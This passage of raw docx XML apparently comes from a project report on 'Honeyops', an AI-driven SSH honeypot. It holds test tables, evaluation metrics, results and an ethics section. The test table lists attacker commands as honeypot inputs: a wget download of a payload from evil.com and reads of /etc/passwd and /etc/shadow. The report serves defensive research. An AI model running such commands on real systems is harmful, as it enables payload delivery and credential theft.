              <w:t xml:space="preserve">wget http://evil.com/payload.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI-generated response, IOC extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Database Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Check command history table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Commands stored with timestamps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker Orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">docker-compose up -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">All services healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filesystem Simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Realistic passwd file returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Session Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Two simultaneous connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Independent session states</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MITRE Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1003.008 detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Real-time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attacker connects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;100ms update latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Geolocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connection from new IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Country mapped via ip-api.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="evaluation-metrics"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Evaluation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Measured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Average Session Duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8-12 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Commands per Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15-25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unique IOCs per Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK Mapping Accuracy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Met</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Response Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">500-2000ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">800-1500ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Met</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concurrent Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">25+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Exceeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Update Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;100ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;100ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Met</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">System Uptime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">99%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">99.5%+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✓ Met</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="results-and-discussion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Results and Discussion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Honeyops system successfully achieves all key performance targets. Compared to traditional scripted honeypots (Cowrie baseline showing 2-3 min average sessions), our AI-driven approach demonstrates 300-400% improvement in attacker engagement duration. The automated IOC extraction pipeline averages 15-20 unique indicators per session. MITRE ATT&amp;CK mapping achieves 85%+ confidence accuracy across all 14 tactics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key findings demonstrate that AI-generated responses significantly reduce the fingerprintability of the honeypot, with test attackers unable to distinguish the simulated environment from a real system during blind testing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="65" w:name="Xe70900962e6e4d2b0ba4a2e4ff1329fff2fcdaf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 7: Ethics, Compliance, and Standards</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="61" w:name="ethical-considerations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Ethical Considerations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Informed Consent and Entrapment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The honeypot operates as a passive intelligence collection system. Warning banners are displayed to inform users that activity is monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Data Privacy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All collected data pertains to attacker behavior. Any inadvertently captured personal information is immediately redacted and anonymized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No Harm Principle:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The system never executes real commands on the host operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Disclosure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Intelligence about novel attack patterns is responsibly disclosed to relevant CERTs.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkStart w:id="62" w:name="ai-ethics"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 AI Ethics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transparency:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The AI system’s capabilities and limitations are clearly documented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bias Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Response generation is monitored for bias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Accountability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All AI-generated responses are logged for audit and review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Safety:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Guardrails prevent generation of instructions for harmful real-world activities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="standards-followed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Standards Followed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2329"/>
        <w:gridCol w:w="2562"/>
        <w:gridCol w:w="3028"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web application security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Input validation, XSS prevention, authentication controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ISO 27001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Information security management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data handling policies, access controls, audit trails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NIST Cybersecurity Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cybersecurity best practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Risk assessment, threat intelligence integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Threat intelligence framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Technique classification, TTP identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GDPR Principles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data minimization, purpose limitation, storage limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IEEE 7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ethical AI design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Transparency, accountability, bias mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="risk-mitigation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Risk Mitigation</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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Container breakout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
